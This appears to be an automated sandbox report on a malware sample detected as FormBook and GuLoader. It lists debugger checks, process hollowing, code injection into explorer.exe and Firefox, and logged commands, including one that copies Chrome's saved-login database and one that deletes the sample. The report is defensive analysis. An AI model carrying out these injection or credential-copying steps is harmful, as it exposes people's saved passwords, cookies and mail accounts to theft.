Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h] 10_2_1E93CD40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h] 10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h] 10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D5D60 mov eax, dword ptr fs:[00000030h] 10_2_1E8D5D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E966D79 mov esi, dword ptr fs:[00000030h] 10_2_1E966D79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E945D60 mov eax, dword ptr fs:[00000030h] 10_2_1E945D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E995D65 mov eax, dword ptr fs:[00000030h] 10_2_1E995D65
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BBA80 mov eax, dword ptr fs:[00000030h] 10_2_1E8BBA80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E976A80 mov eax, dword ptr fs:[00000030h] 10_2_1E976A80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E967ABE mov eax, dword ptr fs:[00000030h] 10_2_1E967ABE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h] 10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h] 10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h] 10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97DAAF mov eax, dword ptr fs:[00000030h] 10_2_1E97DAAF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h] 10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h] 10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h] 10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h] 10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h] 10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h] 10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h] 10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h] 10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BFAEC mov edi, dword ptr fs:[00000030h] 10_2_1E8BFAEC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C9AE4 mov eax, dword ptr fs:[00000030h] 10_2_1E8C9AE4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h] 10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h] 10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h] 10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994AE8 mov eax, dword ptr fs:[00000030h] 10_2_1E994AE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h] 10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h] 10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h] 10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94DA31 mov eax, dword ptr fs:[00000030h] 10_2_1E94DA31
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97DA30 mov eax, dword ptr fs:[00000030h] 10_2_1E97DA30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EDA20 mov edx, dword ptr fs:[00000030h] 10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h] 10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h] 10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h] 10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h] 10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h] 10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h] 10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BFA44 mov ecx, dword ptr fs:[00000030h] 10_2_1E8BFA44
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94DA40 mov eax, dword ptr fs:[00000030h] 10_2_1E94DA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h] 10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h] 10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h] 10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h] 10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h] 10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h] 10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94DB90 mov eax, dword ptr fs:[00000030h] 10_2_1E94DB90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941B93 mov eax, dword ptr fs:[00000030h] 10_2_1E941B93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1B80 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F1B9C mov eax, dword ptr fs:[00000030h] 10_2_1E8F1B9C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h] 10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h] 10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h] 10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h] 10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E966BDE mov ebx, dword ptr fs:[00000030h] 10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E966BDE mov eax, dword ptr fs:[00000030h] 10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BEBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BEBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFBC0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBBC0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FBC2 mov eax, dword ptr fs:[00000030h] 10_2_1E93FBC2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h] 10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h] 10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h] 10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h] 10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h] 10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994BE0 mov eax, dword ptr fs:[00000030h] 10_2_1E994BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7BF0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94DB1B mov eax, dword ptr fs:[00000030h] 10_2_1E94DB1B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EEB1C mov eax, dword ptr fs:[00000030h] 10_2_1E8EEB1C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCB1E mov eax, dword ptr fs:[00000030h] 10_2_1E8BCB1E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h] 10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h] 10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCB20 mov eax, dword ptr fs:[00000030h] 10_2_1E8FCB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h] 10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h] 10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h] 10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94DB2A mov eax, dword ptr fs:[00000030h] 10_2_1E94DB2A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94FB45 mov eax, dword ptr fs:[00000030h] 10_2_1E94FB45
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_1E902EB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02322AD2 RtlAddVectoredExceptionHandler, 2_2_02322AD2

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: c8ahotgz8h.exe.14.dr
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D50000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Thread register set: target process: 4644
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4644
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.47858819329.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp Binary or memory string: 1Progman
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000000.47768699367.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47813132765.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48048687198.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47865140469.0000000009713000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndH
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: Zr26f1rL6r.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c8ahotgz8h.exe PID: 5908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c8ahotgz8h.exe PID: 2508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c8ahotgz8h.exe PID: 7388, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
